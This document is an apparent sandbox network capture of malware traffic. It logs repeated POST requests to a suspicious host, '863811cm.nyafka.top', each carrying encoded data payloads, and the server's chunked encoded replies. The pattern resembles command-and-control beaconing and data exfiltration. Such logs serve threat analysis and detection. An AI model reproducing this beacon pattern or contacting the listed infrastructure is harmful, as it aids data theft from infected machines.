                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70234ef90f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5e 2a 39 29 0c 37 3e 3c 05 38 31 2b 00 3d 03 32 58 2b 1f 3b 5f 25 37 27 58 2c 2c 04 0a 21 15 06 5e 28 3c 0f 00 27 02 0e 05 28 21 2a 51 03 1b 3a 00 3f 30 2b 13 3f 54 39 5f 3f 1c 2d 5d 27 33 25 08 29 13 2d 1c 27 2d 3d 05 35 08 34 56 2a 2c 06 0c 2f 02 3c 1c 3e 06 32 5b 34 3b 2a 5f 08 13 39 56 29 16 3c 1c 35 0e 39 5f 36 2d 19 53 22 17 07 0b 3e 2a 2d 08 25 33 0a 5f 3b 32 3b 07 21 3f 30 09 21 05 2a 52 20 2e 2c 1e 25 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'^*9)7><81+=2X+;_%7'X,,!^(<'(!*Q:?0+?T9_?-]'3%)-'-=54V*,/<>2[4;*_9V)<59_6-S">*-%3_;2;!?0!*R .,%"_")Q?TR0
                                                                Oct 11, 2024 01:37:24.191509008 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:24.286881924 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:24.287086964 CEST1984OUTData Raw: 55 5d 58 5a 54 59 5d 52 5e 5a 55 58 51 5d 5a 59 57 58 58 54 55 55 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]XZTY]R^ZUXQ]ZYWXXTUUQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(<U2.0B*6 "+](3&77W')^ "0Y=;#Y$/\*
                                                                Oct 11, 2024 01:37:24.610033989 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4WkuTwSEl9kjAT9%2BK5EBd874YUYr4P1qBuycjnofIkmW%2BtgdnvPSauHOFc3405nC9oMBz9Wpbndcb0pNmcO19hqThtTGtd0QzougGCt%2FtO2XyGHe8yDiX9%2Bwwa13WGqQxIESbb2U"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70267b630f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 59 3e 00 2e 55 20 58 37 11 2f 1f 33 02 29 2d 22 58 2b 32 34 07 26 0a 37 15 3a 5a 26 0d 36 28 20 15 3d 2c 04 13 24 5a 2b 5a 3c 0b 2a 51 03 1b 39 59 28 0d 2f 1d 2b 54 31 5d 2b 54 2e 04 33 33 29 09 2b 2d 2e 0d 30 07 31 06 36 22 2b 0d 3e 12 30 0f 2c 2b 2f 40 29 01 2e 59 20 01 2a 5f 08 13 39 1c 28 2b 3b 0e 21 51 36 04 22 04 20 0f 22 2a 3a 53 29 07 2d 0d 24 1d 33 06 2c 0b 38 13 37 11 37 57 21 3c 32 56 34 3e 30 11 32 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'Y>.U X7/3)-"X+24&7:Z&6( =,$Z+Z<*Q9Y(/+T1]+T.33)+-.016"+>0,+/@).Y *_9(+;!Q6" "*:S)-$3,877W!<2V4>028"_")Q?TR0
                                                                Oct 11, 2024 01:37:24.722718954 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:24.818187952 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:24.818433046 CEST1984OUTData Raw: 50 58 5d 5e 54 55 58 50 5e 5a 55 58 51 54 5a 5f 57 50 58 5d 55 52 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PX]^TUXP^ZUXQTZ_WPX]URQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9+$[<#T2,@(0_#+(+39!7;V3->$52,Y=#Y$/\*%
                                                                Oct 11, 2024 01:37:25.077531099 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IIQa%2BqzNcps6bO4IJ9DmYbOa6c7on7DxxNLJiENZIws6fNStYD0aHkDVsM%2BkdoDdg47H5rHd7mBhldiWwewRYyRBD8Mdam6Xz8NSg9UpXfetinjr6ND%2FxJlO6TvjXL%2FVuxCQD05y"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7029def60f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5c 2a 5f 31 0a 37 3e 3f 5d 38 21 0d 06 29 04 31 05 28 32 30 02 32 27 3b 17 3a 12 08 0a 23 3b 3c 5e 2a 2c 3e 11 30 3c 01 5a 2b 0b 2a 51 03 1b 3a 06 2b 0d 24 09 29 32 35 5a 28 21 2e 06 24 1d 3e 18 2a 13 32 08 24 10 00 58 35 1f 2c 53 2a 5a 38 0b 38 02 28 1a 29 38 31 03 23 3b 2a 5f 08 13 39 1c 29 06 38 56 36 09 26 07 35 3d 3f 55 35 07 26 52 3f 39 32 54 24 0a 24 1a 3b 31 37 03 20 3f 2b 13 36 3c 26 1d 37 13 33 02 31 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'\*_17>?]8!)1(202';:#;<^*,>0<Z+*Q:+$)25Z(!.$>*2$X5,S*Z88()81#;*_9)8V6&5=?U5&R?92T$$;17 ?+6<&7318"_")Q?TR0
                                                                Oct 11, 2024 01:37:25.191760063 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:25.287038088 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:25.287380934 CEST1984OUTData Raw: 55 5f 58 5a 51 5e 5d 52 5e 5a 55 58 51 56 5a 5d 57 5d 58 55 55 53 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U_XZQ^]R^ZUXQVZ]W]XUUSQ]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9\+[ >)3T'=$C+%<50+ :4?Q'=T(88"<Y>#Y$/\*-
                                                                Oct 11, 2024 01:37:25.587778091 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IeGkMpWAR2NTKgaTAQO9uFsoY4sR%2BakGCB89f%2Fjg7Q%2BJlTDTWEjY8mmVBAHNo4c%2F9G%2FDPBjnA5pDXmVUXFzEkiAddHXePrzEKKNpjbFO3Tn17GTfDu37B0cIj2Rz3NbVwe2CpuTg"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a702cb99f0f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 59 29 17 08 1f 34 3d 2b 12 2c 31 02 5e 3e 03 3e 59 28 21 01 59 26 27 3f 5e 39 2f 25 56 36 05 20 15 28 3c 25 06 24 02 05 10 3c 0b 2a 51 03 1b 3a 07 3c 0a 2f 57 29 32 21 17 3f 0b 25 14 30 55 36 18 2b 2e 31 1d 27 10 03 04 22 08 20 54 29 12 09 1f 2c 3b 02 19 3d 28 39 04 37 01 2a 5f 08 13 39 1c 2a 01 3b 0e 22 0e 21 15 22 04 38 0b 20 39 21 0f 3e 2a 32 51 33 30 20 5e 2c 32 23 02 37 11 2b 1c 22 02 00 55 23 03 23 05 25 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'Y)4=+,1^>>Y(!Y&'?^9/%V6 (<%$<*Q:</W)2!?%0U6+.1'" T),;=(97*_9*;"!"8 9!>*2Q30 ^,2#7+"U##%("_")Q?TR0
                                                                Oct 11, 2024 01:37:25.691431046 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:25.787009954 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:25.787353039 CEST1984OUTData Raw: 55 5f 5d 5a 51 5c 58 5f 5e 5a 55 58 51 57 5a 5c 57 5d 58 5c 55 55 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U_]ZQ\X_^ZUXQWZ\W]X\UUQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9)> +8&=??5<]!,<#=#4'9S)8,G 1/);#Y$/\*)
                                                                Oct 11, 2024 01:37:26.100105047 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLVVfkJAA1CF6ea4fgy%2BTDa1iaiSV013SGU24cFpkf6mE9klZ4qQlR1%2FEE8npu9n7KynO3oFm5yI9ddQlNLidLpUiiiPKxAd31uLuXoXu9oUW4HySciRr1O46ZKZ9I5mnddh930H"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a702fdce40f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 07 2a 39 22 52 22 3d 23 5c 38 21 33 02 29 13 3a 14 3c 21 33 12 32 1a 33 59 2e 05 25 57 23 2b 3c 5c 3d 05 32 5a 24 2c 34 03 3f 31 2a 51 03 1b 3a 07 3f 30 2f 54 2b 22 2d 5d 2b 54 3d 5e 30 1d 2a 1b 29 5b 22 09 30 2e 26 59 21 22 23 0e 2a 2c 0d 1e 2f 2b 3f 43 3e 3b 26 5a 21 2b 2a 5f 08 13 3a 0f 3d 3b 3c 51 22 37 07 5e 36 2e 3f 10 22 17 35 0b 2a 07 2e 13 33 0a 3f 05 2f 0c 3c 13 37 11 20 08 35 12 0c 55 34 3d 20 11 26 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$*9"R"=#\8!3):<!323Y.%W#+<\=2Z$,4?1*Q:?0/T+"-]+T=^0*)["0.&Y!"#*,/+?C>;&Z!+*_:=;<Q"7^6.?"5*.3?/<7 5U4= &8"_")Q?TR0
                                                                Oct 11, 2024 01:37:26.207503080 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:26.303024054 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:26.303442955 CEST1984OUTData Raw: 50 5c 5d 5b 51 5f 58 53 5e 5a 55 58 51 5d 5a 5b 57 5b 58 59 55 5c 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P\][Q_XS^ZUXQ]Z[W[XYU\QYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X++*'S18?5 #;<3 83.=>$B!<)+#Y$/\*
                                                                Oct 11, 2024 01:37:26.602454901 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59SOjvaSjex%2BqgF8n8Bwqmy9l8YPTkYhsCZcuKoyOKwaRDotd9z%2FtI0LOstVM6p6yfKIE9c2P1exob4V0We9F6PZ6zlitioxcO6oT89HmvIDZoOq%2BshNBKEzV8s4OMv%2BxDQz8hr%2B"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7033197c0f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5e 2a 5f 22 10 20 3e 0e 03 2f 22 3c 10 29 13 3e 15 3c 21 06 07 26 42 37 5c 2e 2c 35 1f 35 3b 0d 06 3d 2f 32 12 30 12 2b 1f 3c 21 2a 51 03 1b 39 11 28 55 2c 0d 3f 32 26 02 3c 22 0f 59 27 0a 3d 40 3d 03 2d 1d 30 00 3a 16 35 32 3c 1c 29 2c 3f 10 2d 3b 37 07 2a 06 3a 11 37 11 2a 5f 08 13 39 55 2a 3b 24 54 20 24 25 14 21 13 15 56 36 07 2a 19 3e 39 2a 57 27 55 38 1a 2d 21 28 5a 34 01 2b 50 21 5a 3d 0c 37 13 3c 13 25 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'^*_" >/"<)><!&B7\.,55;=/20+<!*Q9(U,?2&<"Y'=@=-0:52<),?-;7*:7*_9U*;$T $%!V6*>9*W'U8-!(Z4+P!Z=7<%"_")Q?TR0
                                                                Oct 11, 2024 01:37:26.708388090 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1980
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:26.808737040 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:26.809070110 CEST1980OUTData Raw: 55 5d 5d 54 54 5f 58 57 5e 5a 55 58 51 5c 5a 52 57 5a 58 55 55 56 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]TT_XW^ZUXQ\ZRWZXUUVQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+>4>9/T13?%5$<" 4'=>;?"!0>#Y$/\*
                                                                Oct 11, 2024 01:37:27.108716965 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fda3IixglFAZSPxt05xFWzXEobx0DSyOZxgdkAWqWeXDg8LYei6CAUi3ISKfIGrbz8EwQHSxW3lqOHyXLBTLO4FuUC%2BsWqWZqi8BREaxmde%2FpEqSbUHSJdejqp33biMUINc6n4g7"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70364d450f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 58 3e 3a 3a 1e 20 00 01 5b 38 0f 28 10 2b 3d 22 16 29 32 30 00 24 24 24 04 39 05 29 52 21 3b 02 14 3d 2c 2a 5a 33 3c 24 01 28 21 2a 51 03 1b 3a 00 3c 1d 05 1e 28 0c 21 14 28 32 3e 05 26 23 3a 1d 3d 13 0f 57 25 3e 0f 06 21 0f 3b 0f 2a 02 0e 0b 2c 38 3f 42 3d 2b 3a 58 34 01 2a 5f 08 13 39 50 3d 2b 38 1e 21 34 25 5d 23 3d 3f 1f 21 39 36 19 3e 00 3d 0d 27 33 0a 5e 2c 22 38 10 21 2f 0d 1d 21 12 0c 56 23 04 30 59 26 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'X>:: [8(+=")20$$$9)R!;=,*Z3<$(!*Q:<(!(2>&#:=W%>!;*,8?B=+:X4*_9P=+8!4%]#=?!96>='3^,"8!/!V#0Y&8"_")Q?TR0
                                                                Oct 11, 2024 01:37:27.222841978 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:27.318110943 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:27.613776922 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rduWUhYbypuD343ViuNyTP%2FzKlhciHKVoxrzZxJoDINTDbhYJWKczf%2BFycsqQJE5PhKZnZTj9N8eIDAVVVuSEubXTftW%2B9XgX9c%2BUFbw26CFQ1sOOzc34cgGqbGVX7qFx1Ccpibe"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a703979010f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 14 3e 39 39 0f 37 07 2f 5d 3b 0f 3b 03 2a 13 3d 04 3f 0f 01 5f 31 34 16 04 39 3c 07 1c 22 3b 24 5e 2a 2c 0c 1c 24 3c 37 58 29 31 2a 51 03 1b 39 5b 2b 0a 2c 0d 3c 32 31 5c 3c 0b 25 1a 24 0d 29 08 3d 5b 29 56 24 00 31 00 21 0f 24 55 29 5a 24 0c 38 02 28 19 28 38 39 05 37 3b 2a 5f 08 13 3a 0d 3e 38 24 54 36 34 3e 00 21 2d 11 53 22 39 07 0e 3d 39 00 1d 24 30 38 59 2c 22 2f 06 23 2f 01 57 35 12 32 57 21 2d 20 1e 25 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'>997/];;*=?_149<";$^*,$<7X)1*Q9[+,<21\<%$)=[)V$1!$U)Z$8((897;*_:>8$T64>!-S"9=9$08Y,"/#/W52W!- %("_")Q?TR0
                                                                Oct 11, 2024 01:37:27.722592115 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:27.817910910 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:28.118160009 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WCKR%2Bbx9%2Fde7G5%2F25XuJxpexvUG9He8%2B2S%2B7Lvl06rbEvrt5kO4754pLgOmRXcDj6cCoTQE5eu4YFSCkEOGQN6x0RSNsCSxzoNKPaUFBChz8Aq4gq0SxRhrWtPIxiYxNBJ7t5kOu"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a703c9d000f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 04 3d 07 0c 52 37 00 2f 11 2f 08 3c 12 2a 3d 29 01 3c 31 2c 01 24 37 2b 5d 2d 02 2e 0c 22 02 2c 5f 29 3c 2e 5a 27 2c 23 5c 28 31 2a 51 03 1b 39 5f 28 30 34 0f 28 32 39 5f 28 32 04 01 27 30 36 1a 3e 3e 2a 0c 27 3d 31 06 21 22 20 54 3e 3c 27 52 2f 28 2f 45 29 2b 31 02 20 2b 2a 5f 08 13 3a 0d 29 06 2c 50 22 27 2a 04 22 3d 34 0c 22 00 29 0a 2a 29 00 51 33 33 3f 06 2d 32 28 59 20 2c 28 08 36 2f 3d 0d 34 04 3f 04 25 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$=R7//<*=)<1,$7+]-.",_)<.Z',#\(1*Q9_(04(29_(2'06>>*'=1!" T><'R/(/E)+1 +*_:),P"'*"=4")*)Q33?-2(Y ,(6/=4?%"_")Q?TR0
                                                                Oct 11, 2024 01:37:28.223231077 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:28.318239927 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:28.621596098 CEST750INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kahdxtpymdbk%2BGodJQ41x%2BUAjFQMsXFu3kx2PXp5JzPh2HkM0gd%2BlSDansuOU6WQvQ9x7LYqsN%2F8I8uO96hQjNVAyPht8eNQKNXRfpaRF16y1JRUMpiaoI%2B%2FqlqMyhlzyP6kKSHs"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a703fb8b90f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 04 28 2a 32 55 20 07 3c 03 2c 31 2c 13 3e 2e 39 00 3c 22 28 00 31 24 1e 00 39 02 22 0c 35 15 3f 05 29 2c 32 13 24 2c 20 05 29 31 2a 51 03 1b 39 5e 3f 23 33 50 28 0b 39 19 3c 31 2d 5e 30 33 32 1a 2a 04 29 50 30 3e 07 07 21 31 37 0e 3d 3f 3b 56 2c 15 0e 18 2a 06 32 11 23 2b 2a 5f 08 13 39 57 29 38 09 0e 35 27 0b 59 21 3d 3f 1f 36 3a 25 0a 3e 3a 3e 54 24 55 23 07 3b 0b 20 59 37 3f 27 55 23 3c 32 52 34 2e 2b 04 27 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$(*2U <,1,>.9<"(1$9"5?),2$, )1*Q9^?#3P(9<1-^032*)P0>!17=?;V,*2#+*_9W)85'Y!=?6:%>:>T$U#; Y7?'U#<2R4.+'8"_")Q?TR0
                                                                Oct 11, 2024 01:37:28.738524914 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:28.833584070 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:29.131598949 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
